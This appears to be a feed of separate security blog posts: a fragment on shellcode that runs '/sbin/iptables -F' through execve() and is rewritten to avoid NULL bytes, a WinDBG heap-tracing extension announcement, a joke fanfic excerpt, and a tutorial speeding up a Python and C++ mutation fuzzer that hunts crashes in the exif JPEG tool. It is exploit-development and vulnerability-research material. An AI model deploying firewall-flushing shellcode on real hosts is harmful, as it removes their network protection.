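A quick check that none of the stored dwords contains a 0x00 byte is worthwhile, since a badly chosen delta could reintroduce NULL bytes.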


0x3 - iptables -F
link: www.shell-storm.org/shellcode/files/shellcode-368.php


The following instructions build the string /sbin/iptables -F, which then gets executed using execve().




I used the JMP-CALL-POP method to change it up. Basically the /sbin/iptables -F hex codes from above are replaced. The new shellcode size is 58 bytes.


Thank you for reading.

heappo: a WinDBG extension for heap tracing

24 March 2020 at 00:00
Preface

During these days of forced quarantine time-off, I have been reviewing notes and exercises from the outstanding Corelan Advanced training I took last October at Brucon, and so I decided to work on some tooling I had in mind lately. The idea came from this research by Sam Brown from F-Secure: after testing the tool I decided to port it to the latest PyKD version so that it supports both Python3 and Python2 and can run on both x86 and x64 (tested on latest Win10 1909). I aptly named this effort Heappo, and here are some of its key features and enhancements.

Taking a joke a little too far.

By: tiraniddo
1 April 2020 at 11:00

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of disdain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Fuzzing Like A Caveman 2: Improving Performance

By: h0mbre
8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. There won’t be any wholesale changes; we’re simply looking to improve upon what we already had in the previous post. We’ll still walk away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post; we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMware Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that begin (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

  • commented out the print statement for the iterations counter every 100 iterations,
  • added print statements to notify us of any Segfaults,
  • hardcoded 1k iterations,
  • added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.
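The same kind of report can also be produced from inside a script, which is handy if you only want to profile one function rather than the whole program. This is a minimal sketch using the standard cProfile and pstats modules; `busy_work` and `profile_report` are hypothetical names used for illustration, not part of the fuzzer.

```python
import cProfile
import io
import pstats


def busy_work(n):
    # Stand-in for one fuzzing iteration; purely illustrative.
    return sum(i * i for i in range(n))


def profile_report(func, *args, limit=10):
    """Profile func(*args) and return the top entries sorted by cumulative time."""
    profiler = cProfile.Profile()
    profiler.enable()
    func(*args)
    profiler.disable()

    # Write the report into a string instead of stdout so it can be inspected.
    stream = io.StringIO()
    stats = pstats.Stats(profiler, stream=stream)
    stats.sort_stats("cumulative").print_stats(limit)
    return stream.getvalue()


report = profile_report(busy_work, 10000)
print(report)
```

Sorting by `"cumulative"` here matches the `-s cumtime` ordering used on the command line.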

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
     1000    0.028    0.000  100.923    0.101 pty_spawn.py:316(close)
     1000    0.025    0.000  100.816    0.101 ptyprocess.py:387(close)
     1000    0.061    0.000    9.949    0.010 pty_spawn.py:36(__init__)
     1000    0.074    0.000    9.764    0.010 pty_spawn.py:239(_spawn)
     1000    0.041    0.000    8.682    0.009 pty_spawn.py:312(_spawnpty)
     1000    0.266    0.000    8.641    0.009 ptyprocess.py:178(spawn)
     1000    0.011    0.000    7.491    0.007 spawnbase.py:240(expect)
     1000    0.036    0.000    7.479    0.007 spawnbase.py:343(expect_list)
     1000    0.128    0.000    7.409    0.007 expect.py:91(expect_loop)
     6432    6.473    0.001    6.473    0.001 {built-in method posix.read}
     5432    0.089    0.000    3.818    0.001 pty_spawn.py:415(read_nonblocking)
     7348    0.029    0.000    3.162    0.000 utils.py:130(select_ignore_interrupts)
     7348    3.127    0.000    3.127    0.000 {built-in method select.select}
     1000    0.790    0.001    1.777    0.002 blog.py:15(bit_flip)
     1000    0.015    0.000    1.311    0.001 blog.py:134(create_new)
     1000    0.100    0.000    1.101    0.001 pty.py:79(fork)
     1000    1.000    0.001    1.000    0.001 {built-in method posix.forkpty}
-----SNIP-----

For this type of analysis, we don’t really care about how many segfaults we had since we’re not really tinkering much with the mutation methods or comparing different methods. Granted there will be some randomness here, as a crash would necessitate extra processing, but this will do for now.

I kept only the entries where we spent more than 1.0 seconds cumulatively and snipped the rest. You can see we spent by far the most time in blog.py:140(exif). A whopping 118 seconds out of 122 seconds total. Our exif() function seems to be a major problem in our performance.

We can see that most of the time underneath that function was not spent in our own code at all: roughly 103 of those seconds went to time.sleep, most of it apparently under the pty_spawn.py and ptyprocess.py close() calls that come from our pexpect usage. Let’s rewrite our function using Popen from the subprocess module and see if we can improve performance here!

Here is our redefined exif() function:

from subprocess import Popen, PIPE

def exif(counter,data):

    p = Popen(["exif", "mutated.jpg", "-verbose"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    # a negative returncode means the child was killed by a signal; -11 is SIGSEGV
    if p.returncode == -11:
        with open("crashes2/crash.{}.jpg".format(str(counter)), "ab+") as f:
            f.write(data)
        print("Segfault!")

    #if counter % 100 == 0:
    #    print(counter, end="\r")

Here is our performance report:

2065580 function calls (2065443 primitive calls) in 2.756 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000    2.756    2.756 {built-in method builtins.exec}
        1    0.038    0.038    2.756    2.756 subpro.py:3(<module>)
     1000    0.020    0.000    1.917    0.002 subpro.py:139(exif)
     1000    0.026    0.000    1.121    0.001 subprocess.py:681(__init__)
     1000    0.099    0.000    1.045    0.001 subprocess.py:1412(_execute_child)
 -----SNIP-----

What a difference. This fuzzer, with the redefined exif() function, performed the same amount of work in under 3 seconds!! That’s insane! The old fuzzer: 122 seconds, new fuzzer: 2.7 seconds, roughly a 44x speedup.
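The `p.returncode == -11` check in the redefined exif() works because, on POSIX systems, subprocess reports a child killed by signal N as a return code of -N, and SIGSEGV is signal 11 on Linux. Here is a small sketch of that behavior, assuming a POSIX host; the `CRASHER` one-liner and `crashed_with_segfault` are hypothetical stand-ins for a crashing target, not part of the fuzzer.

```python
import signal
import subprocess
import sys

# Child process that sends SIGSEGV to itself, standing in for a crashing target.
CRASHER = "import os, signal; os.kill(os.getpid(), signal.SIGSEGV)"


def crashed_with_segfault(argv):
    """Run argv and report whether it was terminated by SIGSEGV (POSIX only)."""
    proc = subprocess.Popen(argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    proc.communicate()
    # On POSIX, a negative returncode -N means the child was killed by signal N.
    return proc.returncode == -signal.SIGSEGV


print(crashed_with_segfault([sys.executable, "-c", CRASHER]))
print(crashed_with_segfault([sys.executable, "-c", "pass"]))
```

Comparing against `-signal.SIGSEGV` instead of a literal -11 keeps the intent readable and avoids hardcoding the signal number.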

Improving Further in Python

Let’s try to continue improving our fuzzer all within Python. First, let’s get a good benchmark for us to perform against. We’ll get our optimized Python fuzzer to iterate through 50,000 fuzzing iterations and we’ll use the cProfile module again to get some fine-grained statistics about where we spend our time.

102981395 function calls (102981258 primitive calls) in 141.488 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  141.488  141.488 {built-in method builtins.exec}
        1    1.724    1.724  141.488  141.488 subpro.py:3(<module>)
    50000    0.992    0.000  102.588    0.002 subpro.py:139(exif)
    50000    1.248    0.000   61.562    0.001 subprocess.py:681(__init__)
    50000    5.034    0.000   57.826    0.001 subprocess.py:1412(_execute_child)
    50000    0.437    0.000   39.586    0.001 subprocess.py:920(communicate)
    50000    2.527    0.000   39.064    0.001 subprocess.py:1662(_communicate)
   208254   37.508    0.000   37.508    0.000 {built-in method posix.read}
   158238    0.577    0.000   28.809    0.000 selectors.py:402(select)
   158238   28.131    0.000   28.131    0.000 {method 'poll' of 'select.poll' objects}
    50000   11.784    0.000   25.819    0.001 subpro.py:14(bit_flip)
  7950000    3.666    0.000   10.431    0.000 random.py:256(choice)
    50000    8.421    0.000    8.421    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.162    0.000    7.358    0.000 subpro.py:133(create_new)
  7950000    4.096    0.000    6.130    0.000 random.py:224(_randbelow)
   203090    5.016    0.000    5.016    0.000 {built-in method io.open}
    50000    4.211    0.000    4.211    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.643    0.000    4.194    0.000 os.py:617(get_exec_path)
    50000    1.733    0.000    3.356    0.000 subpro.py:8(get_bytes)
 35866791    2.635    0.000    2.635    0.000 {method 'append' of 'list' objects}
   100000    0.070    0.000    1.960    0.000 subprocess.py:1014(wait)
   100000    0.252    0.000    1.902    0.000 selectors.py:351(register)
   100000    0.444    0.000    1.890    0.000 subprocess.py:1621(_wait)
   100000    0.675    0.000    1.583    0.000 selectors.py:234(register)
   350000    0.432    0.000    1.501    0.000 subprocess.py:1471(<genexpr>)
 12074141    1.434    0.000    1.434    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.059    0.000    1.358    0.000 subprocess.py:1608(_try_wait)
    50000    1.299    0.000    1.299    0.000 {built-in method posix.waitpid}
   100000    0.488    0.000    1.058    0.000 os.py:674(__getitem__)
   100000    1.017    0.000    1.017    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

50,000 iterations took us a grand total of 141 seconds, this is great performance compared to what we were dealing with. We previously took 122 seconds to do 1,000 iterations! Once again filtering on only time where we spent over 1.0 seconds, we see that we again spent most of our time in exif() but we also see some performance issues in bit_flip() as we spent 25 cumulative seconds there. Let’s try to optimize that function a bit.

Let’s go ahead and repost what the old bit_flip() function looked like:

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

This function is admittedly a bit clumsy. We can simplify it greatly by utilizing better logic. I find this is often the case with programming in my limited experience, you can have all of the fancy esoteric programming knowledge you want, but if the logic behind your program is unsound, then the program’s performance will suffer.

Let’s reduce the number of type conversions we do, for instance ints to str or vice versa, and let’s just write less code overall. We can accomplish what we want with a re-defined bit_flip() function as follows:

def bit_flip(data):

	length = len(data) - 4

	num_of_flips = int(length * .01)

	picked_indexes = []
	
	flip_array = [1,2,4,8,16,32,64,128]

	counter = 0
	while counter < num_of_flips:
		picked_indexes.append(random.choice(range(0,length)))
		counter += 1


	for x in picked_indexes:
		mask = random.choice(flip_array)
		data[x] = data[x] ^ mask

	return data

If we employ this new function and monitor the results, we get a performance grade of:

59376275 function calls (59376138 primitive calls) in 135.582 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  135.582  135.582 {built-in method builtins.exec}
        1    1.940    1.940  135.582  135.582 subpro.py:3(<module>)
    50000    0.978    0.000  107.857    0.002 subpro.py:111(exif)
    50000    1.450    0.000   64.236    0.001 subprocess.py:681(__init__)
    50000    5.566    0.000   60.141    0.001 subprocess.py:1412(_execute_child)
    50000    0.534    0.000   42.259    0.001 subprocess.py:920(communicate)
    50000    2.827    0.000   41.637    0.001 subprocess.py:1662(_communicate)
   199549   38.249    0.000   38.249    0.000 {built-in method posix.read}
   149537    0.555    0.000   30.376    0.000 selectors.py:402(select)
   149537   29.722    0.000   29.722    0.000 {method 'poll' of 'select.poll' objects}
    50000    3.993    0.000   14.471    0.000 subpro.py:14(bit_flip)
  7950000    3.741    0.000   10.316    0.000 random.py:256(choice)
    50000    9.973    0.000    9.973    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.163    0.000    7.034    0.000 subpro.py:105(create_new)
  7950000    3.987    0.000    5.952    0.000 random.py:224(_randbelow)
   202567    4.966    0.000    4.966    0.000 {built-in method io.open}
    50000    4.042    0.000    4.042    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.539    0.000    3.828    0.000 os.py:617(get_exec_path)
    50000    1.843    0.000    3.607    0.000 subpro.py:8(get_bytes)
   100000    0.074    0.000    2.133    0.000 subprocess.py:1014(wait)
   100000    0.463    0.000    2.059    0.000 subprocess.py:1621(_wait)
   100000    0.274    0.000    2.046    0.000 selectors.py:351(register)
   100000    0.782    0.000    1.702    0.000 selectors.py:234(register)
    50000    0.055    0.000    1.507    0.000 subprocess.py:1608(_try_wait)
    50000    1.452    0.000    1.452    0.000 {built-in method posix.waitpid}
   350000    0.424    0.000    1.436    0.000 subprocess.py:1471(<genexpr>)
 12066317    1.339    0.000    1.339    0.000 {method 'getrandbits' of '_random.Random' objects}
   100000    0.466    0.000    1.048    0.000 os.py:674(__getitem__)
   100000    1.014    0.000    1.014    0.000 {method 'close' of '_io.BufferedReader' objects}
-----SNIP-----

As you can see from the metrics, we only spend 14 cumulative seconds in bit_flip() at this point! In our last go-round, we spent 25 seconds here, this is almost twice as fast at this point. We’re doing a good job of optimizing in my opinion here.
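To convince ourselves that the XOR version really does the same thing as the old string-juggling version, we can compare the two on every byte value and every bit position. This is just a sanity-check sketch; `flip_bit_via_string` and `flip_bit_via_xor` are hypothetical helper names that isolate the per-byte logic of the old and new bit_flip().

```python
def flip_bit_via_string(value, picked_index):
    """Old approach: flip one character of the 8-digit binary string."""
    bits = list(format(value, "08b"))
    bits[picked_index] = "0" if bits[picked_index] == "1" else "1"
    return int("".join(bits), 2)


def flip_bit_via_xor(value, mask):
    """New approach: XOR with a mask that has exactly one bit set."""
    return value ^ mask


# String index 0 is the most significant bit, so it pairs with mask 128 (1 << 7).
mismatches = [
    (value, index)
    for value in range(256)
    for index in range(8)
    if flip_bit_via_string(value, index) != flip_bit_via_xor(value, 1 << (7 - index))
]
print(len(mismatches))
```

Since each entry of flip_array is a power of two, picking a random mask is equivalent to picking a random bit position, just without the int-to-string round trip.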

Now that we have our ideal Python benchmark (keep in mind there might be opportunities for multi-processing or multi-threading but let’s save this idea for another time), let’s go ahead and port our fuzzer to a new language, C++, and test the performance.

New Fuzzer in C++

To get started, let’s just go ahead and flat out run our newly optimized Python fuzzer through 100,000 fuzzing iterations and see how long in total it takes.

118749892 function calls (118749755 primitive calls) in 256.881 seconds

100k iterations in only 256 seconds! That destroys our previous fuzzer.

That will be our benchmark we try to beat in C++. Now, as unfamiliar as I am with the nuances of Python development, multiply that by 10 and you’ll have my unfamiliarity with C++. This code might be laughable to some, but it’s the best I could manage at the present moment and we can explain each function as it relates to our previous Python code.

Let’s go through, function by function, and describe their implementation.

//
// this function simply creates a stream by opening a file in binary mode;
// finds the end of file, creates a string 'data', resizes data to be the same
// size as the file; moves the file pointer back to the beginning of the file;
// reads the data from the file into the data string;
//
std::string get_bytes(std::string filename)
{
	std::ifstream fin(filename, std::ios::binary);

	if (fin.is_open())
	{
		fin.seekg(0, std::ios::end);
		std::string data;
		data.resize(fin.tellg());
		fin.seekg(0, std::ios::beg);
		fin.read(&data[0], data.size());

		return data;
	}

	else
	{
		std::cout << "Failed to open " << filename << ".\n";
		exit(1);
	}

}

This function, as my comment says, simply retrieves a byte string from our target file, which in the case of our testing will still be Canon_40D.jpg.

//
// this will take 1% of the bytes from our valid jpeg and
// flip a random bit in the byte and return the altered string
//
std::string bit_flip(std::string data)
{
	
	int size = (data.length() - 4);
	int num_of_flips = (int)(size * .01);

	// get a vector full of 1% of random byte indexes
	std::vector<int> picked_indexes;
	for (int i = 0; i < num_of_flips; i++)
	{
		int picked_index = rand() % size;
		picked_indexes.push_back(picked_index);
	}

	// iterate through the data string at those indexes and flip a bit
	for (int i = 0; i < picked_indexes.size(); ++i)
	{
		int index = picked_indexes[i];
		char current = data.at(index);
		int decimal = ((int)current & 0xff);
		
		int bit_to_flip = rand() % 8;
		
		decimal ^= 1 << bit_to_flip;
		decimal &= 0xff;
		
		data[index] = (char)decimal;
	}

	return data;

}

This function is a direct equivalent of our bit_flip() function in our Python script.

//
// takes mutated string and creates new jpeg with it;
//
void create_new(std::string mutated)
{
	std::ofstream fout("mutated.jpg", std::ios::binary);

	if (fout.is_open())
	{
		fout.seekp(0, std::ios::beg);
		fout.write(&mutated[0], mutated.size());
	}
	else
	{
		std::cout << "Failed to create mutated.jpg" << ".\n";
		exit(1);
	}

}

This function will simply create a temporary mutated.jpg file, similar to our create_new() function that we had in the Python script.

//
// function to run a system command and store the output as a string;
// https://www.jeremymorgan.com/tutorials/c-programming/how-to-capture-the-output-of-a-linux-command-in-c/
//
std::string get_output(std::string cmd)
{
	std::string output;
	FILE * stream;
	char buffer[256];

	stream = popen(cmd.c_str(), "r");
	if (stream)
	{
		while (!feof(stream))
		{
			if (fgets(buffer, 256, stream) != NULL) output.append(buffer);
		}
		pclose(stream);
	}

	return output;

}

//
// we actually run our exif command via the get_output() func;
// retrieve the output in the form of a string and then we can parse the string;
// we'll save all the inputs that result in a segfault or floating point exception;
//
void exif(std::string mutated, int counter)
{
	std::string command = "exif mutated.jpg -verbose 2>&1";

	std::string output = get_output(command);

	std::string segfault = "Segmentation";
	std::string floating_point = "Floating";

	std::size_t pos1 = output.find(segfault);
	std::size_t pos2 = output.find(floating_point);

	if (pos1 != std::string::npos)
	{
		std::cout << "Segfault!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".\n";
			exit(1);
		}
	}
	else if (pos2 != std::string::npos)
	{
		std::cout << "Floating Point!\n";
		std::ostringstream oss;
		oss << "/root/cppcrashes/crash." << counter << ".jpg";
		std::string filename = oss.str();
		std::ofstream fout(filename, std::ios::binary);

		if (fout.is_open())
			{
				fout.seekp(0, std::ios::beg);
				fout.write(&mutated[0], mutated.size());
			}
		else
		{
			std::cout << "Failed to create " << filename << ".\n";
			exit(1);
		}
	}
}

These two functions work together. get_output takes a C++ string as a parameter and will run that command on the operating system and capture the output. The function then returns the output as a string to the calling function exif().

exif() will take the output and look for Segmentation fault or Floating point exception errors and then if found, will write those bytes to a file and save them as a crash.<counter>.jpg file. Very similar to our Python fuzzer.

//
// simply generates a vector of strings that are our 'magic' values;
//
std::vector<std::string> vector_gen()
{
	std::vector<std::string> magic;

	using namespace std::string_literals;

	magic.push_back("\xff");
	magic.push_back("\x7f");
	magic.push_back("\x00"s);
	magic.push_back("\xff\xff");
	magic.push_back("\x7f\xff");
	magic.push_back("\x00\x00"s);
	magic.push_back("\xff\xff\xff\xff");
	magic.push_back("\x80\x00\x00\x00"s);
	magic.push_back("\x40\x00\x00\x00"s);
	magic.push_back("\x7f\xff\xff\xff");

	return magic;
}

//
// randomly picks a magic value from the vector and overwrites that many bytes in the image;
//
std::string magic(std::string data, std::vector<std::string> magic)
{
	
	int vector_size = magic.size();
	int picked_magic_index = rand() % vector_size;
	std::string picked_magic = magic[picked_magic_index];
	int size = (data.length() - 4);
	int picked_data_index = rand() % size;
	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.
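For comparison, the same table-driven overwrite can be expressed in Python with a slice assignment, which avoids the long if/elif chain in our original magic() function. This is only a sketch: `MAGIC_VALUES` copies the values from the C++ vector_gen() above, and `magic_overwrite` with its `rng` parameter is a hypothetical name, not code from either fuzzer.

```python
import random

# Same values as the C++ vector_gen() above, written as Python bytes.
MAGIC_VALUES = [
    b"\xff", b"\x7f", b"\x00",
    b"\xff\xff", b"\x7f\xff", b"\x00\x00",
    b"\xff\xff\xff\xff", b"\x80\x00\x00\x00",
    b"\x40\x00\x00\x00", b"\x7f\xff\xff\xff",
]


def magic_overwrite(data, rng=random):
    """Overwrite a random slice of data with a random magic value, in place."""
    value = rng.choice(MAGIC_VALUES)
    # Leave room for the longest (4-byte) value so the length never changes.
    index = rng.randrange(0, len(data) - 4)
    data[index:index + len(value)] = value
    return data


sample = bytearray(range(32))
mutated = magic_overwrite(bytearray(sample), random.Random(1234))
print(len(mutated) == len(sample))
```

Because the replacement slice is exactly as long as the magic value, the file size stays the same, just like `data.replace()` in the C++ version.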

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it to our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milliseconds of: Execution Time: 172638ms or 172 seconds.

